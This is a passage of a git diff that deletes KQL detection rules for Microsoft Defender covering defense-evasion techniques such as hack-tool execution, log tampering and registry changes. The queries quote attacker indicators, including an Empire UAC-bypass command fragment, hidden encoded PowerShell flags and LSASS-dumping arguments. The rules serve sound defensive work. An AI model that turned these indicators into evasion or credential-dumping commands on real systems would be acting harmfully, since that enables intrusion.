-| where ActionType =~ "DeleteValue" and RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\ProtectedFolders"
\ No newline at end of file
diff --git a/Defense Evasion/Forfiles.EXE_Child_Process_Masquerading.kql b/Defense Evasion/Forfiles.EXE_Child_Process_Masquerading.kql
deleted file mode 100644
index 90889ca1..00000000
--- a/Defense Evasion/Forfiles.EXE_Child_Process_Masquerading.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati
-// Date: 2024/01/05
-// Level: high
-// Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (ProcessCommandLine startswith "/c echo \"" and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine endswith ".exe" or InitiatingProcessCommandLine endswith ".exe\"")) and (not(((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") and InitiatingProcessFolderPath endswith "\\forfiles.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Fsutil_Suspicious_Invocation.kql b/Defense Evasion/Fsutil_Suspicious_Invocation.kql
deleted file mode 100644
index a4ffc9ee..00000000
--- a/Defense Evasion/Fsutil_Suspicious_Invocation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Ecco, E.M. Anhaus, oscd.community
-// Date: 2019/09/26
-// Level: high
-// Description: Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).
-Might be used by ransomwares during the attack (seen by NotPetya and others).
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1485
-DeviceProcessEvents
-| where (ProcessCommandLine contains "deletejournal" or ProcessCommandLine contains "createjournal" or ProcessCommandLine contains "setZeroData") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Gpscript_Execution.kql b/Defense Evasion/Gpscript_Execution.kql
deleted file mode 100644
index c9be70bc..00000000
--- a/Defense Evasion/Gpscript_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/16
-// Level: medium
-// Description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " /logon" or ProcessCommandLine contains " /startup") and (FolderPath endswith "\\gpscript.exe" or ProcessVersionInfoOriginalFileName =~ "GPSCRIPT.EXE")) and (not(InitiatingProcessCommandLine =~ "C:\\windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc"))
\ No newline at end of file
diff --git a/Defense Evasion/Greedy_File_Deletion_Using_Del.kql b/Defense Evasion/Greedy_File_Deletion_Using_Del.kql
deleted file mode 100644
index f7cc425a..00000000
--- a/Defense Evasion/Greedy_File_Deletion_Using_Del.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113 , X__Junior (Nextron Systems)
-// Date: 2021/12/02
-// Level: medium
-// Description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains "\\*.au3" or ProcessCommandLine contains "\\*.dll" or ProcessCommandLine contains "\\*.exe" or ProcessCommandLine contains "\\*.js") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Defense Evasion/HH.EXE_Execution.kql b/Defense Evasion/HH.EXE_Execution.kql
deleted file mode 100644
index 2152b61e..00000000
--- a/Defense Evasion/HH.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community
-// Date: 2019/10/24
-// Level: low
-// Description: Detects the execution of "hh.exe" to open ".chm" files.
-// Tags: attack.defense_evasion, attack.t1218.001
-DeviceProcessEvents
-| where ProcessCommandLine contains ".chm" and (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/HTML_Help_HH.EXE_Suspicious_Child_Process.kql b/Defense Evasion/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
deleted file mode 100644
index 25771e32..00000000
--- a/Defense Evasion/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_Covenant_PowerShell_Launcher.kql b/Defense Evasion/HackTool_-_Covenant_PowerShell_Launcher.kql
deleted file mode 100644
index 10ec08bc..00000000
--- a/Defense Evasion/HackTool_-_Covenant_PowerShell_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2020/06/04
-// Level: high
-// Description: Detects suspicious command lines used in Covenant luanchers
-// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1564.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-Command" or ProcessCommandLine contains "-EncodedCommand") and (ProcessCommandLine contains "-Sta" and ProcessCommandLine contains "-Nop" and ProcessCommandLine contains "-Window" and ProcessCommandLine contains "Hidden")) or (ProcessCommandLine contains "sv o (New-Object IO.MemorySteam);sv d " or ProcessCommandLine contains "mshta file.hta" or ProcessCommandLine contains "GruntHTTP" or ProcessCommandLine contains "-EncodedCommand cwB2ACAAbwAgA")
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql b/Defense Evasion/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql
deleted file mode 100644
index bc2833d5..00000000
--- a/Defense Evasion/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2020/05/22
-// Level: high
-// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027.005
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "join" and ProcessCommandLine contains "split") or ProcessCommandLine contains "( $ShellId[1]+$ShellId[13]+'x')" or (ProcessCommandLine contains "( $PSHome[" and ProcessCommandLine contains "]+$PSHOME[" and ProcessCommandLine contains "]+") or ProcessCommandLine contains "( $env:Public[13]+$env:Public[5]+'x')" or (ProcessCommandLine contains "( $env:ComSpec[4," and ProcessCommandLine contains ",25]-Join'')") or ProcessCommandLine contains "[1,3]+'x'-Join'')") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_DInjector_PowerShell_Cradle_Execution.kql b/Defense Evasion/HackTool_-_DInjector_PowerShell_Cradle_Execution.kql
deleted file mode 100644
index 1570339a..00000000
--- a/Defense Evasion/HackTool_-_DInjector_PowerShell_Cradle_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/07
-// Level: critical
-// Description: Detects the use of the Dinject PowerShell cradle based on the specific flags
-// Tags: attack.defense_evasion, attack.t1055
-DeviceProcessEvents
-| where ProcessCommandLine contains " /am51" and ProcessCommandLine contains " /password"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_EDRSilencer_Execution.kql b/Defense Evasion/HackTool_-_EDRSilencer_Execution.kql
deleted file mode 100644
index 2186bbd5..00000000
--- a/Defense Evasion/HackTool_-_EDRSilencer_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: @gott_cyber
-// Date: 2024/01/02
-// Level: high
-// Description: Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.
-
-// Tags: attack.defense_evasion, attack.t1562
-DeviceProcessEvents
-| where FolderPath endswith "\\EDRSilencer.exe" or ProcessVersionInfoOriginalFileName =~ "EDRSilencer.exe" or ProcessVersionInfoFileDescription contains "EDRSilencer"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_Empire_PowerShell_UAC_Bypass.kql b/Defense Evasion/HackTool_-_Empire_PowerShell_UAC_Bypass.kql
deleted file mode 100644
index a4dbd554..00000000
--- a/Defense Evasion/HackTool_-_Empire_PowerShell_UAC_Bypass.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ecco
-// Date: 2019/08/30
-// Level: critical
-// Description: Detects some Empire PowerShell UAC bypass methods
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceProcessEvents
-| where ProcessCommandLine contains " -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)" or ProcessCommandLine contains " -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_F-Secure_C3_Load_by_Rundll32.kql b/Defense Evasion/HackTool_-_F-Secure_C3_Load_by_Rundll32.kql
deleted file mode 100644
index fc12c1e8..00000000
--- a/Defense Evasion/HackTool_-_F-Secure_C3_Load_by_Rundll32.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alfie Champion (ajpc500)
-// Date: 2021/06/02
-// Level: critical
-// Description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains "StartNodeRelay"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_GMER_Rootkit_Detector_and_Remover_Execution.kql b/Defense Evasion/HackTool_-_GMER_Rootkit_Detector_and_Remover_Execution.kql
deleted file mode 100644
index 7fbc35fb..00000000
--- a/Defense Evasion/HackTool_-_GMER_Rootkit_Detector_and_Remover_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/05
-// Level: high
-// Description: Detects the execution GMER tool based on image and hash fields.
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where FolderPath endswith "\\gmer.exe" or (MD5 =~ "e9dc058440d321aa17d0600b3ca0ab04" or SHA1 =~ "539c228b6b332f5aa523e5ce358c16647d8bbe57" or SHA256 =~ "e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173") or (MD5 startswith "E9DC058440D321AA17D0600B3CA0AB04" or SHA1 startswith "539C228B6B332F5AA523E5CE358C16647D8BBE57" or SHA256 startswith "E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173")
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_PowerTool_Execution.kql b/Defense Evasion/HackTool_-_PowerTool_Execution.kql
deleted file mode 100644
index c9ca0ad1..00000000
--- a/Defense Evasion/HackTool_-_PowerTool_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/29
-// Level: high
-// Description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (FolderPath endswith "\\PowerTool.exe" or FolderPath endswith "\\PowerTool64.exe") or ProcessVersionInfoOriginalFileName =~ "PowerTool.exe"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql b/Defense Evasion/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql
deleted file mode 100644
index 90d50234..00000000
--- a/Defense Evasion/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alexander Rausch
-// Date: 2020/06/24
-// Level: high
-// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
-// Tags: attack.execution, attack.defense_evasion, attack.t1106, attack.t1059.003, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "gthread-3.6.dll" or ProcessCommandLine contains "\\Windows\\Temp\\tmp.bat" or ProcessCommandLine contains "sigcmm-2.4.dll") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_SharpEvtMute_Execution.kql b/Defense Evasion/HackTool_-_SharpEvtMute_Execution.kql
deleted file mode 100644
index 76d6ce50..00000000
--- a/Defense Evasion/HackTool_-_SharpEvtMute_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/09/07
-// Level: high
-// Description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceProcessEvents
-| where FolderPath endswith "\\SharpEvtMute.exe" or ProcessVersionInfoFileDescription =~ "SharpEvtMute" or (ProcessCommandLine contains "--Filter \"rule " or ProcessCommandLine contains "--Encoded --Filter \\\"")
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_SharpImpersonation_Execution.kql b/Defense Evasion/HackTool_-_SharpImpersonation_Execution.kql
deleted file mode 100644
index 38bdaaa1..00000000
--- a/Defense Evasion/HackTool_-_SharpImpersonation_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/27
-// Level: high
-// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1134.001, attack.t1134.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " user:" and ProcessCommandLine contains " binary:") or (ProcessCommandLine contains " user:" and ProcessCommandLine contains " shellcode:") or (ProcessCommandLine contains " technique:CreateProcessAsUserW" or ProcessCommandLine contains " technique:ImpersonateLoggedOnuser")) or (FolderPath endswith "\\SharpImpersonation.exe" or ProcessVersionInfoOriginalFileName =~ "SharpImpersonation.exe")
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_Stracciatella_Execution.kql b/Defense Evasion/HackTool_-_Stracciatella_Execution.kql
deleted file mode 100644
index fbafb340..00000000
--- a/Defense Evasion/HackTool_-_Stracciatella_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
-// Tags: attack.execution, attack.defense_evasion, attack.t1059, attack.t1562.001
-DeviceProcessEvents
-| where FolderPath endswith "\\Stracciatella.exe" or ProcessVersionInfoOriginalFileName =~ "Stracciatella.exe" or ProcessVersionInfoFileDescription =~ "Stracciatella" or (SHA256 startswith "9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956" or SHA256 startswith "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a") or (SHA256 in~ ("9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956", "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a"))
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_WinPwn_Execution.kql b/Defense Evasion/HackTool_-_WinPwn_Execution.kql
deleted file mode 100644
index bd621578..00000000
--- a/Defense Evasion/HackTool_-_WinPwn_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/12/04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
-// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_Wmiexec_Default_Powershell_Command.kql b/Defense Evasion/HackTool_-_Wmiexec_Default_Powershell_Command.kql
deleted file mode 100644
index 68ddb59a..00000000
--- a/Defense Evasion/HackTool_-_Wmiexec_Default_Powershell_Command.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/08
-// Level: high
-// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script
-// Tags: attack.defense_evasion, attack.lateral_movement
-DeviceProcessEvents
-| where ProcessCommandLine contains "-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc"
\ No newline at end of file
diff --git a/Defense Evasion/HackTool_-_XORDump_Execution.kql b/Defense Evasion/HackTool_-_XORDump_Execution.kql
deleted file mode 100644
index e4c4bc39..00000000
--- a/Defense Evasion/HackTool_-_XORDump_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/28
-// Level: high
-// Description: Detects suspicious use of XORDump process memory dumping utility
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where FolderPath endswith "\\xordump.exe" or (ProcessCommandLine contains " -process lsass.exe " or ProcessCommandLine contains " -m comsvcs " or ProcessCommandLine contains " -m dbghelp " or ProcessCommandLine contains " -m dbgcore ")
\ No newline at end of file
diff --git a/Defense Evasion/Hide_Schedule_Task_Via_Index_Value_Tamper.kql b/Defense Evasion/Hide_Schedule_Task_Via_Index_Value_Tamper.kql
deleted file mode 100644
index 95c4232d..00000000
--- a/Defense Evasion/Hide_Schedule_Task_Via_Index_Value_Tamper.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/26
-// Level: high
-// Description: Detects when the "index" value of a scheduled task is modified from the registry
-Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)
-
-// Tags: attack.defense_evasion, attack.t1562
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree" and RegistryKey contains "Index")
\ No newline at end of file
diff --git a/Defense Evasion/Hiding_Files_with_Attrib.exe.kql b/Defense Evasion/Hiding_Files_with_Attrib.exe.kql
deleted file mode 100644
index e50cf89e..00000000
--- a/Defense Evasion/Hiding_Files_with_Attrib.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sami Ruohonen
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects usage of attrib.exe to hide files from users.
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " +h " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE")) and (not(ProcessCommandLine contains "\\desktop.ini ")) and (not((ProcessCommandLine =~ "+R +H +S +A \\*.cui" and InitiatingProcessCommandLine =~ "C:\\WINDOWS\\system32\\*.bat" and InitiatingProcessFolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Hiding_User_Account_Via_SpecialAccounts_Registry_Key.kql b/Defense Evasion/Hiding_User_Account_Via_SpecialAccounts_Registry_Key.kql
deleted file mode 100644
index 35550a8f..00000000
--- a/Defense Evasion/Hiding_User_Account_Via_SpecialAccounts_Registry_Key.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2022/07/12
-// Level: high
-// Description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
-// Tags: attack.defense_evasion, attack.t1564.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and ActionType =~ "RegistryValueSet" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList"
\ No newline at end of file
diff --git a/Defense Evasion/Hypervisor_Enforced_Code_Integrity_Disabled.kql b/Defense Evasion/Hypervisor_Enforced_Code_Integrity_Disabled.kql
deleted file mode 100644
index c02daff0..00000000
--- a/Defense Evasion/Hypervisor_Enforced_Code_Integrity_Disabled.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati
-// Date: 2023/03/14
-// Level: high
-// Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and ActionType =~ "RegistryValueSet" and (RegistryKey endswith "\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity" or RegistryKey endswith "\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled")
\ No newline at end of file
diff --git a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols.kql b/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols.kql
deleted file mode 100644
index 8d85ed8d..00000000
--- a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea)
-// Date: 2023/09/05
-// Level: high
-// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
-
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryValueData contains "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and (RegistryKey endswith "\\http" or RegistryKey endswith "\\https")
\ No newline at end of file
diff --git a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql b/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql
deleted file mode 100644
index 914b3568..00000000
--- a/Defense Evasion/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/05
-// Level: high
-// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
-
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and ProcessCommandLine contains "http" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/Defense Evasion/IIS_WebServer_Access_Logs_Deleted.kql b/Defense Evasion/IIS_WebServer_Access_Logs_Deleted.kql
deleted file mode 100644
index eb074d5f..00000000
--- a/Defense Evasion/IIS_WebServer_Access_Logs_Deleted.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/16
-// Level: medium
-// Description: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070
-DeviceFileEvents
-| where FolderPath contains "\\inetpub\\logs\\LogFiles\\" and FolderPath endswith ".log"
\ No newline at end of file
diff --git a/Defense Evasion/Import_LDAP_Data_Interchange_Format_File_Via_Ldifde.EXE.kql b/Defense Evasion/Import_LDAP_Data_Interchange_Format_File_Via_Ldifde.EXE.kql
deleted file mode 100644
index bb522faa..00000000
--- a/Defense Evasion/Import_LDAP_Data_Interchange_Format_File_Via_Ldifde.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: @gott_cyber
-// Date: 2022/09/02
-// Level: medium
-// Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
-
-// Tags: attack.command_and_control, attack.defense_evasion, attack.t1218, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-i" and ProcessCommandLine contains "-f") and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Imports_Registry_Key_From_a_File.kql b/Defense Evasion/Imports_Registry_Key_From_a_File.kql
deleted file mode 100644
index bc1d23a1..00000000
--- a/Defense Evasion/Imports_Registry_Key_From_a_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Oddvar Moe, Sander Wiebing, oscd.community
-// Date: 2020/10/07
-// Level: medium
-// Description: Detects the import of the specified file to the registry with regedit.exe.
-// Tags: attack.t1112, attack.defense_evasion
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " /i " or ProcessCommandLine contains " /s " or ProcessCommandLine contains ".reg") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c ") and ProcessCommandLine matches regex ":[^ \\\\]")))
\ No newline at end of file
diff --git a/Defense Evasion/Imports_Registry_Key_From_an_ADS.kql b/Defense Evasion/Imports_Registry_Key_From_an_ADS.kql
deleted file mode 100644
index 7ba7ccb4..00000000
--- a/Defense Evasion/Imports_Registry_Key_From_an_ADS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Oddvar Moe, Sander Wiebing, oscd.community
-// Date: 2020/10/12
-// Level: high
-// Description: Detects the import of a alternate datastream to the registry with regedit.exe.
-// Tags: attack.t1112, attack.defense_evasion
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " /i " or ProcessCommandLine contains ".reg") and ProcessCommandLine matches regex ":[^ \\\\]") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c ")))
\ No newline at end of file
diff --git a/Defense Evasion/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql b/Defense Evasion/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql
deleted file mode 100644
index 786d5065..00000000
--- a/Defense Evasion/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: A. Sungurov , oscd.community
-// Date: 2020/10/12
-// Level: low
-// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
